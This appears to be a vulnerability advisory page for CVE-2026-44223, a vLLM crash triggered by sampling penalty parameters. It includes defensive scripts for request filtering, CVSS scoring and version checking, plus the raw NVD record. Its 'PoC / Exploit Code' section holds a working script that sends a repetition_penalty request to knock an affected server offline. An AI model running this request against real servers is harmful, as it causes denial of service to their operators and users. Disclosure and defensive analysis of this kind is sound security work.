Security Vulnerability Report
CVE-2026-44223 CVSS 6.5 MEDIUM

CVE-2026-44223

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses a sampling penalty parameter (repetition_penalty, frequency_penalty, or presence_penalty); a single request with such a parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
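
Because the description names the trigger precisely, an operator who cannot upgrade right away could filter these fields at a reverse proxy or API gateway in front of an affected server. The sketch below is a hypothetical workaround, not part of vLLM or the advisory. `strip_penalties` and `PENALTY_FIELDS` are illustrative names, and the sketch assumes OpenAI-style JSON request bodies with the penalty fields at the top level.

```python
from typing import Any

# Penalty fields that the CVE description names as crash triggers.
PENALTY_FIELDS = ("repetition_penalty", "frequency_penalty", "presence_penalty")


def strip_penalties(body: dict[str, Any]) -> tuple[dict[str, Any], list[str]]:
    """Return a copy of a request body without penalty fields, plus the
    names of the fields that were removed. The input dict is not modified.

    Hypothetical gateway-side filter: it drops the fields entirely instead of
    guessing which values are safe, so affected requests lose their penalty
    settings.
    """
    cleaned = {key: value for key, value in body.items() if key not in PENALTY_FIELDS}
    removed = [key for key in PENALTY_FIELDS if key in body]
    return cleaned, removed


if __name__ == "__main__":
    request = {"model": "m", "prompt": "hi", "max_tokens": 50, "repetition_penalty": 1.1}
    cleaned, removed = strip_penalties(request)
    print(cleaned)  # {'model': 'm', 'prompt': 'hi', 'max_tokens': 50}
    print(removed)  # ['repetition_penalty']
```

Rejecting such requests with HTTP 400 instead of stripping the fields would make the changed behavior visible to clients. Either way, the filter is only relevant on deployments that enable the extract_hidden_states proposer, and upgrading to 0.20.0 remains the fix the advisory names.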

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
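
The 6.5 base score follows from the vector through the CVSS v3.1 base equations. With C:N, I:N and A:H, the impact sub-score is 6.42 × 0.56 ≈ 3.595 (reported as 3.6). The exploitability sub-score is 8.22 × 0.85 × 0.77 × 0.62 × 0.85 ≈ 2.835 (reported as 2.8). Their sum, about 6.43, rounds up to 6.5. The sketch below reproduces that arithmetic. The weights are the constants from the FIRST CVSS v3.1 specification. `base_score` and `roundup` are illustrative names, not a library API, and the sketch ignores temporal and environmental metrics.

```python
import math

# CVSS v3.1 base metric weights, from the FIRST CVSS v3.1 specification.
ATTACK_VECTOR = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
ATTACK_COMPLEXITY = {"L": 0.77, "H": 0.44}
PRIVILEGES_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PRIVILEGES_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
USER_INTERACTION = {"N": 0.85, "R": 0.62}
CIA_IMPACT = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Spec-defined Roundup: smallest one-decimal number >= value,
    computed on scaled integers to avoid floating-point artefacts."""
    scaled = round(value * 100_000)
    if scaled % 10_000 == 0:
        return scaled / 100_000.0
    return (math.floor(scaled / 10_000) + 1) / 10.0


def base_score(vector: str) -> tuple[float, float, float]:
    """Return (base score, impact sub-score, exploitability sub-score)."""
    # "CVSS:3.1/AV:N/..." -> {"AV": "N", "AC": "L", ...}
    m = dict(part.split(":") for part in vector.split("/")[1:])
    scope_changed = m["S"] == "C"

    # Impact Sub-Score combines the three CIA impacts.
    iss = 1 - ((1 - CIA_IMPACT[m["C"]]) * (1 - CIA_IMPACT[m["I"]]) * (1 - CIA_IMPACT[m["A"]]))
    if scope_changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    privileges = (PRIVILEGES_CHANGED if scope_changed else PRIVILEGES_UNCHANGED)[m["PR"]]
    exploitability = (8.22 * ATTACK_VECTOR[m["AV"]] * ATTACK_COMPLEXITY[m["AC"]]
                      * privileges * USER_INTERACTION[m["UI"]])

    if impact <= 0:
        base = 0.0
    elif scope_changed:
        base = roundup(min(1.08 * (impact + exploitability), 10))
    else:
        base = roundup(min(impact + exploitability, 10))
    # The sub-scores are reported rounded to one decimal place.
    return base, round(impact, 1), round(exploitability, 1)


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"))  # (6.5, 3.6, 2.8)
```

For comparison, the same vector with PR:N scores 7.5 (HIGH), so the PR:L rating is what keeps this CVE in the MEDIUM band.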

Configurations (Affected Products)

No configuration data available.

vLLM < 0.20.0
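
To see whether a Python environment has an affected release installed, you can compare its vLLM version against the 0.20.0 fix. This is a minimal sketch under stated assumptions. It reads the version with `importlib.metadata` and approximates PEP 440 parsing with a regular expression; the `packaging` library is the more robust choice. As a conservative assumption, it treats pre-releases and dev builds of 0.20.0 as affected. It does not check whether the server enables the extract_hidden_states proposer, which the description implies is also required. `parse_version` and `is_affected` are illustrative names.

```python
import re
from importlib import metadata

# First release that the advisory lists as fixed.
FIXED = (0, 20, 0)

# Suffixes marking a PEP 440 pre-release or dev build, e.g. "rc1" or ".dev3".
PRE_RELEASE = re.compile(r"[-_.]?(a|b|c|rc|alpha|beta|pre|preview|dev)")


def parse_version(version: str) -> tuple[tuple[int, ...], str]:
    """Split a version string into (major, minor, patch) and any trailing text.

    Local build labels such as "+cu128" are dropped first.
    """
    public = version.split("+", 1)[0]
    match = re.match(r"v?(\d+(?:\.\d+)*)(.*)", public)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = tuple(int(part) for part in match.group(1).split("."))
    # Pad or truncate to three components so "0.20" compares equal to "0.20.0".
    release = (numbers + (0, 0, 0))[:3]
    return release, match.group(2)


def is_affected(version: str) -> bool:
    """True if the version predates the 0.20.0 fix.

    Pre-releases and dev builds of 0.20.0 are treated as affected because
    they may predate the fix (a conservative assumption).
    """
    release, suffix = parse_version(version)
    if release < FIXED:
        return True
    return release == FIXED and PRE_RELEASE.match(suffix) is not None


if __name__ == "__main__":
    try:
        installed = metadata.version("vllm")
    except metadata.PackageNotFoundError:
        print("vllm is not installed in this environment")
    else:
        verdict = "affected, upgrade to 0.20.0 or later" if is_affected(installed) else "not affected"
        print(f"vllm {installed}: {verdict}")
```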

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# PoC for CVE-2026-44223
# Target: vLLM server versions < 0.20.0
# Description: This script sends a request with a repetition_penalty parameter
# to trigger the tensor shape mismatch bug in the speculative decoding proposer.
# Per the advisory, the crash requires a server that uses the
# extract_hidden_states speculative decoding proposer.


def check_vulnerability(target_url):
    endpoint = f"{target_url}/v1/completions"

    # Payload containing the sampling penalty parameter that triggers the crash
    payload = {
        "model": "meta-llama/Llama-2-7b-chat-hf",  # Example model name
        "prompt": "Explain this vulnerability.",
        # The crash occurs after the first decode step, so request more than one token
        "max_tokens": 50,
        # The presence of 'repetition_penalty' triggers the incorrect tensor shape
        "repetition_penalty": 1.1,
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        # json= serializes the payload and sets the Content-Type header
        response = requests.post(endpoint, json=payload, timeout=10)

        # If the server crashes, the connection might be reset or return a 500 error
        if response.status_code in (500, 502):
            print(f"[+] Potential vulnerability triggered! Server returned error code: {response.status_code}")
        elif "RuntimeError" in response.text or "Internal Server Error" in response.text:
            print("[+] Vulnerability likely triggered. RuntimeError detected in response.")
        else:
            print("[-] Request completed. Server might be patched or not using the extract_hidden_states proposer.")
            print("Response status:", response.status_code)
    except requests.exceptions.ConnectionError:
        print("[+] Connection error. The EngineCore process may have crashed (DoS).")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)
```

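References

https://github.com/vllm-project/vllm/pull/38610
https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw
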
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44223",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T20:16:43.293",
    "lastModified": "2026-05-12T20:16:43.293",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., \"repetition_penalty\": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-131"},
          {"lang": "en", "value": "CWE-704"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/vllm-project/vllm/pull/38610", "source": "[email protected]"},
      {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw", "source": "[email protected]"}
    ]
  }
}
```
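
The raw record follows the NVD CVE API 2.0 layout. A small parser over that structure is enough to pull out the fields a triage script usually needs. The sketch below runs on a trimmed excerpt of the record above, and `summarize` is a hypothetical helper name. When a record carries several `cvssMetricV31` entries, such as a Primary score from NVD alongside the CNA's Secondary one, the sketch simply takes the first.

```python
import json

# Trimmed excerpt of the record above (descriptions and most CVSS fields omitted).
RECORD = """
{"cve": {"id": "CVE-2026-44223",
  "vulnStatus": "Received",
  "metrics": {"cvssMetricV31": [{"type": "Secondary",
    "cvssData": {"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                 "baseScore": 6.5, "baseSeverity": "MEDIUM"}}]},
  "weaknesses": [{"type": "Primary",
    "description": [{"lang": "en", "value": "CWE-131"},
                    {"lang": "en", "value": "CWE-704"}]}],
  "references": [
    {"url": "https://github.com/vllm-project/vllm/pull/38610"},
    {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw"}]}}
"""


def summarize(record: dict) -> dict:
    """Flatten the fields of a CVE record that triage usually needs."""
    cve = record["cve"]
    # Fall back to an empty metric if no CVSS v3.1 score has been published yet.
    metrics = cve.get("metrics", {}).get("cvssMetricV31") or [{}]
    cvss = metrics[0].get("cvssData", {})
    return {
        "id": cve["id"],
        "status": cve.get("vulnStatus"),
        "vector": cvss.get("vectorString"),
        "score": cvss.get("baseScore"),
        "severity": cvss.get("baseSeverity"),
        # Weaknesses are nested: each entry carries its own list of descriptions.
        "cwes": [d["value"] for w in cve.get("weaknesses", []) for d in w.get("description", [])],
        "references": [r["url"] for r in cve.get("references", [])],
    }


if __name__ == "__main__":
    for key, value in summarize(json.loads(RECORD)).items():
        print(f"{key}: {value}")
```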